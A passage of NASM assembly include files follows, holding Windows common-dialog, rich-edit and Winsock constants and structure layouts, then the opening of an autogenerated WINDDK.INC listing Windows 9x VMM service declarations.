FR_HIDEWHOLEWORD equ 00010000h
FRERR_FINDREPLACECODES equ 4000h
FRERR_BUFFERLENGTHZERO equ 4001h
CF_SCREENFONTS equ 00000001h
CF_PRINTERFONTS equ 00000002h
CF_BOTH equ CF_SCREENFONTS+CF_PRINTERFONTS
CF_SHOWHELP equ 00000004h
CF_ENABLEHOOK equ 00000008h
CF_ENABLETEMPLATE equ 00000010h
CF_ENABLETEMPLATEHANDLE equ 00000020h
CF_INITTOLOGFONTSTRUCT equ 00000040h
CF_USESTYLE equ 00000080h
CF_EFFECTS equ 00000100h
CF_APPLY equ 00000200h
CF_ANSIONLY equ 00000400h
CF_NOVECTORFONTS equ 00000800h
CF_NOOEMFONTS equ CF_NOVECTORFONTS
CF_NOSIMULATIONS equ 00001000h
CF_LIMITSIZE equ 00002000h
CF_FIXEDPITCHONLY equ 00004000h
CF_WYSIWYG equ 00008000h
CF_FORCEFONTEXIST equ 00010000h
CF_SCALABLEONLY equ 00020000h
CF_TTONLY equ 00040000h
CF_NOFACESEL equ 00080000h
CF_NOSTYLESEL equ 00100000h
CF_NOSIZESEL equ 00200000h
CFERR_CHOOSEFONTCODES equ 2000h
CFERR_NOFONTS equ 2001h
CFERR_MAXLESSTHANMIN equ 2002h
WM_CHOOSEFONT_GETLOGFONT equ WM_USER+1
CD_LBSELNOITEMS equ -1
CD_LBSELCHANGE equ 0
CD_LBSELSUB equ 1
CD_LBSELADD equ 2
PD_ALLPAGES equ 00000000h
PD_SELECTION equ 00000001h
PD_PAGENUMS equ 00000002h
PD_NOSELECTION equ 00000004h
PD_NOPAGENUMS equ 00000008h
PD_COLLATE equ 00000010h
PD_PRINTTOFILE equ 00000020h
PD_PRINTSETUP equ 00000040h
PD_NOWARNING equ 00000080h
PD_RETURNDC equ 00000100h
PD_RETURNIC equ 00000200h
PD_RETURNDEFAULT equ 00000400h
PD_SHOWHELP equ 00000800h
PD_ENABLEPRINTHOOK equ 00001000h
PD_ENABLESETUPHOOK equ 00002000h
PD_ENABLEPRINTTEMPLATE equ 00004000h
PD_ENABLESETUPTEMPLATE equ 00008000h
PD_ENABLEPRINTTEMPLATEHANDLE equ 00010000h
PD_ENABLESETUPTEMPLATEHANDLE equ 00020000h
PD_USEDEVMODECOPIES equ 00040000h
PD_DISABLEPRINTTOFILE equ 00080000h
PD_HIDEPRINTTOFILE equ 00100000h
PDERR_PRINTERCODES equ 1000h
PDERR_SETUPFAILURE equ 1001h
PDERR_PARSEFAILURE equ 1002h
PDERR_RETDEFFAILURE equ 1003h
PDERR_LOADDRVFAILURE equ 1004h
PDERR_GETDEVMODEFAIL equ 1005h
PDERR_INITFAILURE equ 1006h
PDERR_NODEVICES equ 1007h
PDERR_NODEFAULTPRN equ 1008h
PDERR_DNDMMISMATCH equ 1009h
PDERR_CREATEICFAILURE equ 100Ah
PDERR_PRINTERNOTFOUND equ 100Bh
PDERR_DEFAULTDIFFERENT equ 100Ch
DN_DEFAULTPRN equ 0001h
OFN_ALLOWMULTISELECT equ 00000200h
OFN_CREATEPROMPT equ 00002000h
OFN_ENABLEHOOK equ 00000020h
OFN_ENABLETEMPLATE equ 00000040h
OFN_ENABLETEMPLATEHANDLE equ 00000080h
OFN_EXPLORER equ 00080000h
OFN_EXTENSIONDIFFERENT equ 00000400h
OFN_FILEMUSTEXIST equ 00001000h
OFN_HIDEREADONLY equ 00000004h
OFN_LONGNAMES equ 00200000h
OFN_NOCHANGEDIR equ 00000008h
OFN_NODEREFERENCELINKS equ 00100000h
OFN_NOLONGNAMES equ 00040000h
OFN_NONETWORKBUTTON equ 00020000h
OFN_NOREADONLYRETURN equ 00008000h
OFN_NOTESTFILECREATE equ 00010000h
OFN_NOVALIDATE equ 00000100h
OFN_OVERWRITEPROMPT equ 00000002h
OFN_PATHMUSTEXIST equ 00000800h
OFN_READONLY equ 00000001h
OFN_SHAREAWARE equ 00004000h
OFN_SHOWHELP equ 00000010h
OFN_SHAREFALLTHROUGH equ 2
OFN_SHARENOWARN equ 1
OFN_SHAREWARN equ 0
CDERR_DIALOGFAILURE equ 0FFFFh
FNERR_FILENAMECODES equ 3000h
FNERR_SUBCLASSFAILURE equ 3001h
FNERR_INVALIDFILENAME equ 3002h
FNERR_BUFFERTOOSMALL equ 3003h
;--------------------------comdlg structures----------------------------
STRUC CHOOSECOLORAPI
.lStructSize RESD 1
.hwndOwner RESD 1
.hInstance RESD 1
.rgbResult RESD 1
.lpCustColors RESD 1
.Flags RESD 1
.lCustData RESD 1
.lpfnHook RESD 1
.lpTemplateName RESD 1
ENDSTRUC
STRUC FINDREPLACE
.lStructSize RESD 1
.hWndOwner RESD 1
.hInstance RESD 1
.Flags RESD 1
.lpstrFindWhat RESD 1
.lpstrReplaceWith RESD 1
.wFindWhatLen RESW 1
.wReplaceWithLen RESW 1
.lCustData RESD 1
.lpfnHook RESD 1
.lpTemplateName RESD 1
ENDSTRUC
STRUC CHOOSEFONTAPI
.lStructSize RESD 1
.hWndOwner RESD 1
.hDC RESD 1
.lpLogFont RESD 1
.iPointSize RESD 1
.Flags RESD 1
.rgbColors RESD 1
.lCustData RESD 1
.lpfnHook RESD 1
.lpTemplateName RESD 1
.hInstance RESD 1
.lpszStyle RESD 1
.nFontType RESW 1
.Alignment RESW 1
.nSizeMin RESD 1
.nSizeMax RESD 1
ENDSTRUC
STRUC PRINTDLGAPI
.lStructSize RESD 1
.hWndOwner RESD 1
.hDevMode RESD 1
.hDevNames RESD 1
.hDC RESD 1
.Flags RESD 1
.nFromPage RESW 1
.nToPage RESW 1
.nMinPage RESW 1
.nMaxPage RESW 1
.nCopies RESW 1
.hInstance RESD 1
.lCustData RESD 1
.lpfnPrintHook RESD 1
.lpfnSetupHook RESD 1
.lpPrintTemplateName RESD 1
.lpPrintSetupTemplateName RESD 1
.hPrintTemplate RESD 1
.hSetupTemplate RESD 1
ENDSTRUC
STRUC OPENFILENAME
.lStructSize RESD 1
.hWndOwner RESD 1
.hInstance RESD 1
.lpstrFilter RESD 1
.lpstrCustomFilter RESD 1
.nMaxCustFilter RESD 1
.nFilterIndex RESD 1
.lpstrFile RESD 1
.nMaxFile RESD 1
.lpstrFileTitle RESD 1
.nMaxFileTitle RESD 1
.lpstrInitialDir RESD 1
.lpstrTitle RESD 1
.Flags RESD 1
.nFileOffset RESW 1
.nFileExtension RESW 1
.lpstrDefExt RESD 1
.lCustData RESD 1
.lpfnHook RESD 1
.lpTemplateName RESD 1
ENDSTRUC
;--------------------------riched equates-------------------------------
cchTextLimitDefault equ 32767
EM_CANPASTE equ WM_USER+50
EM_DISPLAYBAND equ WM_USER+51
EM_EXGETSEL equ WM_USER+52
EM_EXLIMITTEXT equ WM_USER+53
EM_EXLINEFROMCHAR equ WM_USER+54
EM_EXSETSEL equ WM_USER+55
EM_FINDTEXT equ WM_USER+56
EM_FORMATRANGE equ WM_USER+57
EM_GETCHARFORMAT equ WM_USER+58
EM_GETEVENTMASK equ WM_USER+59
EM_GETOLEINTERFACE equ WM_USER+60
EM_GETPARAFORMAT equ WM_USER+61
EM_GETSELTEXT equ WM_USER+62
EM_HIDESELECTION equ WM_USER+63
EM_PASTESPECIAL equ WM_USER+64
EM_REQUESTRESIZE equ WM_USER+65
EM_SELECTIONTYPE equ WM_USER+66
EM_SETBKGNDCOLOR equ WM_USER+67
EM_SETCHARFORMAT equ WM_USER+68
EM_SETEVENTMASK equ WM_USER+69
EM_SETOLECALLBACK equ WM_USER+70
EM_SETPARAFORMAT equ WM_USER+71
EM_SETTARGETDEVICE equ WM_USER+72
EM_STREAMIN equ WM_USER+73
EM_STREAMOUT equ WM_USER+74
EM_GETTEXTRANGE equ WM_USER+75
EM_FINDWORDBREAK equ WM_USER+76
EM_SETOPTIONS equ WM_USER+77
EM_GETOPTIONS equ WM_USER+78
EM_FINDTEXTEX equ WM_USER+79
EM_GETWORDBREAKPROCEX equ WM_USER+80
EM_SETWORDBREAKPROCEX equ WM_USER+81
EM_SETPUNCTUATION equ WM_USER+100
EM_GETPUNCTUATION equ WM_USER+101
EM_SETWORDWRAPMODE equ WM_USER+102
EM_GETWORDWRAPMODE equ WM_USER+103
EM_SETIMECOLOR equ WM_USER+104
EM_GETIMECOLOR equ WM_USER+105
EM_SETIMEOPTIONS equ WM_USER+106
EM_GETIMEOPTIONS equ WM_USER+107
EN_MSGFILTER equ 0700h
EN_REQUESTRESIZE equ 0701h
EN_SELCHANGE equ 0702h
EN_DROPFILES equ 0703h
EN_PROTECTED equ 0704h
EN_CORRECTTEXT equ 0705h
EN_STOPNOUNDO equ 0706h
EN_IMECHANGE equ 0707h
EN_SAVECLIPBOARD equ 0708h
EN_OLEOPFAILED equ 0709h
ENM_NONE equ 00000000h
ENM_CHANGE equ 00000001h
ENM_UPDATE equ 00000002h
ENM_SCROLL equ 00000004h
ENM_KEYEVENTS equ 00010000h
ENM_MOUSEEVENTS equ 00020000h
ENM_REQUESTRESIZE equ 00040000h
ENM_SELCHANGE equ 00080000h
ENM_DROPFILES equ 00100000h
ENM_PROTECTED equ 00200000h
ENM_CORRECTTEXT equ 00400000h
ENM_IMECHANGE equ 00800000h
ES_SAVESEL equ 00008000h
ES_SUNKEN equ 00004000h
ES_DISABLENOSCROLL equ 00002000h
ES_SELECTIONBAR equ 01000000h
ES_EX_NOCALLOLEINIT equ 01000000h
ES_VERTICAL equ 00400000h
ES_NOIME equ 00080000h
ES_SELFIME equ 00040000h
ECO_AUTOWORDSELECTION equ 00000001h
ECO_AUTOVSCROLL equ 00000040h
ECO_AUTOHSCROLL equ 00000080h
ECO_NOHIDESEL equ 00000100h
ECO_READONLY equ 00000800h
ECO_WANTRETURN equ 00001000h
ECO_SAVESEL equ 00008000h
ECO_SELECTIONBAR equ 01000000h
ECO_VERTICAL equ 00400000h
ECOOP_SET equ 0001h
ECOOP_OR equ 0002h
ECOOP_AND equ 0003h
ECOOP_XOR equ 0004h
WB_CLASSIFY equ 3
WB_MOVEWORDLEFT equ 4
WB_MOVEWORDRIGHT equ 5
WB_LEFTBREAK equ 6
WB_RIGHTBREAK equ 7
WB_MOVEWORDPREV equ 4
WB_MOVEWORDNEXT equ 5
WB_PREVBREAK equ 6
WB_NEXTBREAK equ 7
PC_FOLLOWING equ 1
PC_LEADING equ 2
PC_OVERFLOW equ 3
PC_DELIMITER equ 4
WBF_WORDWRAP equ 010h
WBF_WORDBREAK equ 020h
WBF_OVERFLOW equ 040h
WBF_LEVEL1 equ 080h
WBF_LEVEL2 equ 100h
WBF_CUSTOM equ 200h
IMF_FORCENONE equ 0001h
IMF_FORCEENABLE equ 0002h
IMF_FORCEDISABLE equ 0004h
IMF_CLOSESTATUSWINDOW equ 0008h
IMF_VERTICAL equ 0020h
IMF_FORCEACTIVE equ 0040h
IMF_FORCEINACTIVE equ 0080h
IMF_FORCEREMEMBER equ 0100h
WBF_CLASS equ 0Fh
WBF_ISWHITE equ 10h
WBF_BREAKLINE equ 20h
WBF_BREAKAFTER equ 40h
CFM_BOLD equ 00000001h
CFM_ITALIC equ 00000002h
CFM_UNDERLINE equ 00000004h
CFM_STRIKEOUT equ 00000008h
CFM_PROTECTED equ 00000010h
CFM_SIZE equ 80000000h
CFM_COLOR equ 40000000h
CFM_FACE equ 20000000h
CFM_OFFSET equ 10000000h
CFM_CHARSET equ 08000000h
CFE_BOLD equ 0001h
CFE_ITALIC equ 0002h
CFE_UNDERLINE equ 0004h
CFE_STRIKEOUT equ 0008h
CFE_PROTECTED equ 0010h
CFE_AUTOCOLOR equ 40000000h
yHeightCharPtsMost equ 1638
SCF_SELECTION equ 0001h
SCF_WORD equ 0002h
SF_TEXT equ 0001h
SF_RTF equ 0002h
SF_RTFNOOBJS equ 0003h
SF_TEXTIZED equ 0004h
SFF_SELECTION equ 8000h
SFF_PLAINRTF equ 4000h
MAX_TAB_STOPS equ 32
lDefaultTab equ 720
PFM_STARTINDENT equ 00000001h
PFM_RIGHTINDENT equ 00000002h
PFM_OFFSET equ 00000004h
PFM_ALIGNMENT equ 00000008h
PFM_TABSTOPS equ 00000010h
PFM_NUMBERING equ 00000020h
PFM_OFFSETINDENT equ 80000000h
PFN_BULLET equ 0001h
PFA_LEFT equ 0001h
PFA_RIGHT equ 0002h
PFA_CENTER equ 0003h
SEL_EMPTY equ 0000h
SEL_TEXT equ 0001h
SEL_OBJECT equ 0002h
SEL_MULTICHAR equ 0004h
SEL_MULTIOBJECT equ 0008h
OLEOP_DOVERB equ 1
;--------------------------riched structures-----------------------------
STRUC CHARFORMAT
.cbSize RESD 1
.dwMask RESD 1
.dwEffects RESD 1
.yHeight RESD 1
.yOffset RESD 1
.crTextColor RESD 1
.bCharSet RESB 1
.bPitchAndFamily RESB 1
.szFaceName RESB 1
ENDSTRUC
STRUC CHARRANGE
.cpMin RESD 1
.cpMax RESD 1
ENDSTRUC
STRUC TEXTRANGE
.chrg RESB CHARRANGE_size
.lpstrText RESD 1
ENDSTRUC
STRUC EDITSTREAM
.dwCookie RESD 1
.dwError RESD 1
.pfnCallback RESD 1
ENDSTRUC
STRUC FINDTEXT
.chrg RESB CHARRANGE_size
.lpstrText RESD 1
ENDSTRUC
STRUC FINDTEXTEX
.chrg RESB CHARRANGE_size
.lpstrText RESD 1
.chrgText RESB CHARRANGE_size
ENDSTRUC
STRUC FORMATRANGE
.hdc RESD 1
.hdcTarget RESD 1
.rc RESB RECT_size
.rcPage RESB RECT_size
.chrg RESB CHARRANGE_size
ENDSTRUC
STRUC PARAFORMAT
.cbSize RESD 1
.dwMask RESD 1
.wNumbering RESW 1
.wReserved RESW 1
.dxStartIndent RESD 1
.dxRightIndent RESD 1
.dxOffset RESD 1
.wAlignment RESW 1
.cTabCount RESW 1
.rgxTabs RESD 1
ENDSTRUC
STRUC MSGFILTER
.nmhdr RESB NMHDR_size
.msg RESD 1
.wParam RESD 1
.lParam RESD 1
ENDSTRUC
STRUC REQRESIZE
.nmhdr RESB NMHDR_size
.rc RESB RECT_size
ENDSTRUC
STRUC SELCHANGE
.nmhdr RESB NMHDR_size
.chrg RESB CHARRANGE_size
.seltyp RESW 1
ENDSTRUC
STRUC ENDROPFILES
.nmhdr RESB NMHDR_size
.hDrop RESD 1
.cp RESD 1
.fProtected RESD 1
ENDSTRUC
STRUC ENPROTECTED
.nmhdr RESB NMHDR_size
.msg RESD 1
.wParam RESD 1
.lParam RESD 1
.chrg RESB CHARRANGE_size
ENDSTRUC
STRUC ENSAVECLIPBOARD
.nmhdr RESB NMHDR_size
.cObjectCount RESD 1
.cch RESD 1
ENDSTRUC
STRUC ENOLEOPFAILED
.nmhdr RESB NMHDR_size
.iob RESD 1
.lOper RESD 1
.hr RESD 1
ENDSTRUC
STRUC ENCORRECTTEXT
.nmhdr RESB NMHDR_size
.chrg RESB CHARRANGE_size
.seltyp RESW 1
ENDSTRUC
STRUC PUNCTUATION
.iSize RESD 1
.szPunctuation RESD 1
ENDSTRUC
STRUC COMPCOLOR
.crText RESD 1
.crBackground RESD 1
.dwEffects RESD 1
ENDSTRUC
STRUC REPASTESPECIAL
.dwAspect RESD 1
.dwParam RESD 1
ENDSTRUC
;--------------------------wsock32 equates-------------------------------
WSADESCRIPTION_LEN equ 256
WSASYS_STATUS_LEN equ 128
IPPROTO_IP equ 0
IPPROTO_ICMP equ 1
IPPROTO_GGP equ 2
IPPROTO_TCP equ 6
IPPROTO_PUP equ 12
IPPROTO_UDP equ 17
IPPROTO_IDP equ 22
IPPROTO_ND equ 77
IPPROTO_RAW equ 255
IPPROTO_MAX equ 256
IOCPARM_MASK equ 7Fh
IOC_VOID equ 20000000h
IOC_OUT equ 40000000h
IOC_IN equ 80000000h
IOC_INOUT equ IOC_IN|IOC_OUT
FIONBIO equ 8004667Eh
FIONSYNC equ 8004667Dh
FIONREAD equ 4004667Fh
IPPORT_ECHO equ 7
IPPORT_DISCARD equ 9
IPPORT_SYSTAT equ 11
IPPORT_DAYTIME equ 13
IPPORT_NETSTAT equ 15
IPPORT_FTP equ 21
IPPORT_TELNET equ 23
IPPORT_SMTP equ 25
IPPORT_TIMESERVER equ 37
IPPORT_NAMESERVER equ 42
IPPORT_WHOIS equ 43
IPPORT_MTP equ 57
IPPORT_TFTP equ 69
IPPORT_RJE equ 77
IPPORT_FINGER equ 79
IPPORT_TTYLINK equ 87
IPPORT_SUPDUP equ 95
IPPORT_EXECSERVER equ 512
IPPORT_LOGINSERVER equ 513
IPPORT_CMDSERVER equ 514
IPPORT_EFSSERVER equ 520
IPPORT_BIFFUDP equ 512
IPPORT_WHOSERVER equ 513
IPPORT_ROUTESERVER equ 520
IPPORT_RESERVED equ 1024
IMPLINK_IP equ 155
IMPLINK_LOWEXPER equ 156
IMPLINK_HIGHEXPER equ 158
IN_CLASSA_NET equ 0FF000000h
IN_CLASSA_NSHIFT equ 24
IN_CLASSA_HOST equ 000FFFFFFh
IN_CLASSA_MAX equ 128
IN_CLASSB_NET equ 0FFFF0000h
IN_CLASSB_NSHIFT equ 16
IN_CLASSB_HOST equ 00000FFFFh
IN_CLASSB_MAX equ 65536
IN_CLASSC_NET equ 0FFFFFF00h
IN_CLASSC_NSHIFT equ 8
IN_CLASSC_HOST equ 0000000FFh
INADDR_ANY equ 000000000h
INADDR_LOOPBACK equ 07F000001h
INADDR_BROADCAST equ 0FFFFFFFFh
INADDR_NONE equ 0FFFFFFFFh
SOCK_STREAM equ 1
SOCK_DGRAM equ 2
SOCK_RAW equ 3
SOCK_RDM equ 4
SOCK_SEQPACKET equ 5
SO_DEBUG equ 00001h
SO_ACCEPTCONN equ 00002h
SO_REUSEADDR equ 00004h
SO_KEEPALIVE equ 00008h
SO_DONTROUTE equ 00010h
SO_BROADCAST equ 00020h
SO_USELOOPBACK equ 00040h
SO_LINGER equ 00080h
SO_OOBINLINE equ 00100h
SOL_SOCKET equ 0FFFFh
SO_DONTLINGER equ (-1-SO_LINGER)
SO_SNDBUF equ 01001h
SO_RCVBUF equ 01002h
SO_SNDLOWAT equ 01003h
SO_RCVLOWAT equ 01004h
SO_SNDTIMEO equ 01005h
SO_RCVTIMEO equ 01006h
SO_ERROR equ 01007h
SO_TYPE equ 01008h
TCP_NODELAY equ 00001h
AF_UNSPEC equ 0
AF_UNIX equ 1
AF_INET equ 2
AF_IMPLINK equ 3
AF_PUP equ 4
AF_CHAOS equ 5
AF_NS equ 6
AF_IPX equ 6
AF_ISO equ 7
AF_OSI equ AF_ISO
AF_ECMA equ 8
AF_DATAKIT equ 9
AF_CCITT equ 10
AF_SNA equ 11
AF_DECnet equ 12
AF_DLI equ 13
AF_LAT equ 14
AF_HYLINK equ 15
AF_APPLETALK equ 16
AF_NETBIOS equ 17
AF_MAX equ 18
PF_UNSPEC equ AF_UNSPEC
PF_UNIX equ AF_UNIX
PF_INET equ AF_INET
PF_IMPLINK equ AF_IMPLINK
PF_PUP equ AF_PUP
PF_CHAOS equ AF_CHAOS
PF_NS equ AF_NS
PF_IPX equ AF_IPX
PF_ISO equ AF_ISO
PF_OSI equ AF_OSI
PF_ECMA equ AF_ECMA
PF_DATAKIT equ AF_DATAKIT
PF_CCITT equ AF_CCITT
PF_SNA equ AF_SNA
PF_DECnet equ AF_DECnet
PF_DLI equ AF_DLI
PF_LAT equ AF_LAT
PF_HYLINK equ AF_HYLINK
PF_APPLETALK equ AF_APPLETALK
PF_MAX equ AF_MAX
SOMAXCONN equ 5
MSG_OOB equ 01h
MSG_PEEK equ 02h
MSG_DONTROUTE equ 04h
MSG_MAXIOVLEN equ 16
MAXGETHOSTSTRUCT equ 1024
FD_READ equ 001h
FD_WRITE equ 002h
FD_OOB equ 004h
FD_ACCEPT equ 008h
FD_CONNECT equ 010h
FD_CLOSE equ 020h
WSABASEERR equ 10000
WSAEINTR equ WSABASEERR+4
WSAEBADF equ WSABASEERR+9
WSAEACCES equ WSABASEERR+13
WSAEFAULT equ WSABASEERR+14
WSAEINVAL equ WSABASEERR+22
WSAEMFILE equ WSABASEERR+24
WSAEWOULDBLOCK equ WSABASEERR+35
WSAEINPROGRESS equ WSABASEERR+36
WSAEALREADY equ WSABASEERR+37
WSAENOTSOCK equ WSABASEERR+38
WSAEDESTADDRREQ equ WSABASEERR+39
WSAEMSGSIZE equ WSABASEERR+40
WSAEPROTOTYPE equ WSABASEERR+41
WSAENOPROTOOPT equ WSABASEERR+42
WSAEPROTONOSUPPORT equ WSABASEERR+43
WSAESOCKTNOSUPPORT equ WSABASEERR+44
WSAEOPNOTSUPP equ WSABASEERR+45
WSAEPFNOSUPPORT equ WSABASEERR+46
WSAEAFNOSUPPORT equ WSABASEERR+47
WSAEADDRINUSE equ WSABASEERR+48
WSAEADDRNOTAVAIL equ WSABASEERR+49
WSAENETDOWN equ WSABASEERR+50
WSAENETUNREACH equ WSABASEERR+51
WSAENETRESET equ WSABASEERR+52
WSAECONNABORTED equ WSABASEERR+53
WSAECONNRESET equ WSABASEERR+54
WSAENOBUFS equ WSABASEERR+55
WSAEISCONN equ WSABASEERR+56
WSAENOTCONN equ WSABASEERR+57
WSAESHUTDOWN equ WSABASEERR+58
WSAETOOMANYREFS equ WSABASEERR+59
WSAETIMEDOUT equ WSABASEERR+60
WSAECONNREFUSED equ WSABASEERR+61
WSAELOOP equ WSABASEERR+62
WSAENAMETOOLONG equ WSABASEERR+63
WSAEHOSTDOWN equ WSABASEERR+64
WSAEHOSTUNREACH equ WSABASEERR+65
WSAENOTEMPTY equ WSABASEERR+66
WSAEPROCLIM equ WSABASEERR+67
WSAEUSERS equ WSABASEERR+68
WSAEDQUOT equ WSABASEERR+69
WSAESTALE equ WSABASEERR+70
WSAEREMOTE equ WSABASEERR+71
WSASYSNOTREADY equ WSABASEERR+91
WSAVERNOTSUPPORTED equ WSABASEERR+92
WSANOTINITIALISED equ WSABASEERR+93
WSAHOST_NOT_FOUND equ WSABASEERR+1001
HOST_NOT_FOUND equ WSAHOST_NOT_FOUND
WSATRY_AGAIN equ WSABASEERR+1002
TRY_AGAIN equ WSATRY_AGAIN
WSANO_RECOVERY equ WSABASEERR+1003
NO_RECOVERY equ WSANO_RECOVERY
WSANO_DATA equ WSABASEERR+1004
NO_DATA equ WSANO_DATA
WSANO_ADDRESS equ WSANO_DATA
NO_ADDRESS equ WSANO_ADDRESS
EWOULDBLOCK equ WSAEWOULDBLOCK
EINPROGRESS equ WSAEINPROGRESS
EALREADY equ WSAEALREADY
ENOTSOCK equ WSAENOTSOCK
EDESTADDRREQ equ WSAEDESTADDRREQ
EMSGSIZE equ WSAEMSGSIZE
EPROTOTYPE equ WSAEPROTOTYPE
ENOPROTOOPT equ WSAENOPROTOOPT
EPROTONOSUPPORT equ WSAEPROTONOSUPPORT
ESOCKTNOSUPPORT equ WSAESOCKTNOSUPPORT
EOPNOTSUPP equ WSAEOPNOTSUPP
EPFNOSUPPORT equ WSAEPFNOSUPPORT
EAFNOSUPPORT equ WSAEAFNOSUPPORT
EADDRINUSE equ WSAEADDRINUSE
EADDRNOTAVAIL equ WSAEADDRNOTAVAIL
ENETDOWN equ WSAENETDOWN
ENETUNREACH equ WSAENETUNREACH
ENETRESET equ WSAENETRESET
ECONNABORTED equ WSAECONNABORTED
ECONNRESET equ WSAECONNRESET
ENOBUFS equ WSAENOBUFS
EISCONN equ WSAEISCONN
ENOTCONN equ WSAENOTCONN
ESHUTDOWN equ WSAESHUTDOWN
ETOOMANYREFS equ WSAETOOMANYREFS
ETIMEDOUT equ WSAETIMEDOUT
ECONNREFUSED equ WSAECONNREFUSED
ELOOP equ WSAELOOP
ENAMETOOLONG equ WSAENAMETOOLONG
EHOSTDOWN equ WSAEHOSTDOWN
EHOSTUNREACH equ WSAEHOSTUNREACH
ENOTEMPTY equ WSAENOTEMPTY
EPROCLIM equ WSAEPROCLIM
EUSERS equ WSAEUSERS
EDQUOT equ WSAEDQUOT
ESTALE equ WSAESTALE
EREMOTE equ WSAEREMOTE
FD_SETSIZE equ 64
INVALID_SOCKET equ (-1-0)
SOCKET_ERROR equ -1
SOCKET_BUFFER_SIZE equ 512
ICMP_ECHOREPLY equ 0
ICMP_ECHOREQ equ 8
;------------------------wsock32 structures-----------------------------
STRUC fd_setstruc
.fd_count RESD 1
.fd_array RESD 1
ENDSTRUC
STRUC timeval
.tv_sec RESD 1
.tv_usec RESD 1
ENDSTRUC
STRUC sockaddr_in
.sin_family RESW 1
.sin_port RESW 1
.sin_addr RESD 1
.sin_zero RESB 8
ENDSTRUC
STRUC sockaddr
.sa_family RESW 1
.sa_data RESW 1
ENDSTRUC
STRUC WSAdata
.wVersion RESW 1
.wHighVersion RESW 1
.szDescription RESB WSADESCRIPTION_LEN+1
.szSystemStatus RESB WSASYS_STATUS_LEN+1
.iMaxSockets RESW 1
.iMaxUdpDg RESW 1
.lpVendorInfo RESD 1
ENDSTRUC
STRUC sockproto
.sp_family RESW 1
.sp_protocol RESW 1
ENDSTRUC
STRUC linger
.l_onoff RESW 1
.l_linger RESW 1
ENDSTRUC
STRUC hostentStru
.h_name RESD 1
.h_alias RESD 1
.h_addr RESW 1
.h_len RESW 1
.h_list RESD 1
ENDSTRUC
STRUC netent
.n_name RESD 1
.n_aliases RESD 1
.n_addrtype RESW 1
.n_net RESD 1
ENDSTRUC
STRUC servent
.s_name RESD 1
.s_aliases RESD 1
.s_port RESW 1
.s_proto RESD 1
ENDSTRUC
STRUC icmp_hdr
.icmp_type RESB 1
.icmp_code RESB 1
.icmp_cksum RESW 1
.icmp_id RESW 1
.icmp_seq RESW 1
.icmp_data RESB 1
ENDSTRUC
STRUC ip_hdr
.ip_hlv RESB 1
.ip_tos RESB 1
.ip_len RESW 1
.ip_id RESW 1
.ip_off RESW 1
.ip_ttl RESB 1
.ip_p RESB 1
.ip_cksum RESW 1
.ip_src RESD 1
.ip_dest RESD 1
ENDSTRUC
STRUC ICMP_OPTIONS
.Ttl RESB 1
.Tos RESB 1
.Flags RESB 1
.OptionsSize RESB 1
.OptionsData RESD 1
ENDSTRUC
STRUC ICMP_ECHO_REPLY
.Address RESD 1
.Status RESD 1
.RoundTripTime RESD 1
.DataSize RESW 1
.Reserved RESW 1
.DataPointer RESD 1
.Options RESD 1
.zData RESB 250
ENDSTRUC
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WIN32N.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[WINDDK.INC]ÄÄÄ
;///////////////////////////////////////////////////////////////////
;// winddk.inc
;//
;// This NASM include file has been autogenerated by VXDi2n
;// from Windows DDK Include direcrory ()
;//
%ifndef INCLUDED_WINDDK_INC__
%define INCLUDED_WINDDK_INC__
%ifdef WIN403SERVICES
VMM_Service _PageOutPages ; 0x0192 ord
VMM_Service _Call_On_My_Not_Flat_Stack ; 0x0193 ord
VMM_Service _LinRegionLock ; 0x0194 ord
VMM_Service _LinRegionUnLock ; 0x0195 ord
VMM_Service _AttemptingSomethingDangerous ; 0x0196 ord
VMM_Service _Vsprintf ; 0x0197 ord
VMM_Service _Vsprintfw ; 0x0198 ord
VMM_Service Load_FS_Service ; 0x0199 ord
VMM_Service Assert_FS_Service ; 0x019a ord
VMM_Service ObsoleteRtlUnwind ; 0x019b ord
VMM_Service ObsoleteRtlRaiseException ; 0x019c ord
VMM_Service ObsoleteRtlRaiseStatus ; 0x019d ord
VMM_Service ObsoleteKeGetCurrentIrql ; 0x019e ord
VMM_Service ObsoleteKfRaiseIrql ; 0x019f ord
VMM_Service ObsoleteKfLowerIrql ; 0x01a0 ord
VMM_Service _Begin_Preemptable_Code ; 0x01a1 ord
VMM_Service _End_Preemptable_Code ; 0x01a2 ord
VMM_Service Set_Preemptable_Count ; 0x01a3 ord
VMM_Service ObsoleteKeInitializeDpc ; 0x01a4 ord
VMM_Service ObsoleteKeInsertQueueDpc ; 0x01a5 ord
VMM_Service ObsoleteKeRemoveQueueDpc ; 0x01a6 ord
VMM_Service HeapAllocateEx ; 0x01a7 ord
VMM_Service HeapReAllocateEx ; 0x01a8 ord
VMM_Service HeapGetSizeEx ; 0x01a9 ord
VMM_Service HeapFreeEx ; 0x01aa ord
VMM_Service _Get_CPUID_Flags ; 0x01ab ord
VMM_Service KeCheckDivideByZeroTrap ; 0x01ac ord
%endif
%ifdef WIN41SERVICES
VMM_Service _RegisterGARTHandler ; 0x01ad ord
VMM_Service _GARTReserve ; 0x01ae ord
VMM_Service _GARTCommit ; 0x01af ord
VMM_Service _GARTUnCommit ; 0x01b0 ord
VMM_Service _GARTFree ; 0x01b1 ord
VMM_Service _GARTMemAttributes ; 0x01b2 ord
VMM_Service KfRaiseIrqlToDpcLevel ; 0x01b3 ord
VMM_Service VMMCreateThreadEx ; 0x01b4 ord
VMM_Service _FlushCaches ; 0x01b5 ord
VMM_Service Set_Thread_Win32_Pri_NoYield ; 0x01b6 ord
VMM_Service _FlushMappedCacheBlock ; 0x01b7 ord
VMM_Service _ReleaseMappedCacheBlock ; 0x01b8 ord
VMM_Service Run_Preemptable_Events ; 0x01b9 ord
VMM_Service _MMPreSystemExit ; 0x01ba ord
VMM_Service _MMPageFileShutDown ; 0x01bb ord
VMM_Service _Set_Global_Time_Out_Ex ; 0x01bc ord
VMM_Service Query_Thread_Priority ; 0x01bd ord
%endif
End_Service_Table VMM
%endif ; INCLUDED_WINDDK_INC__
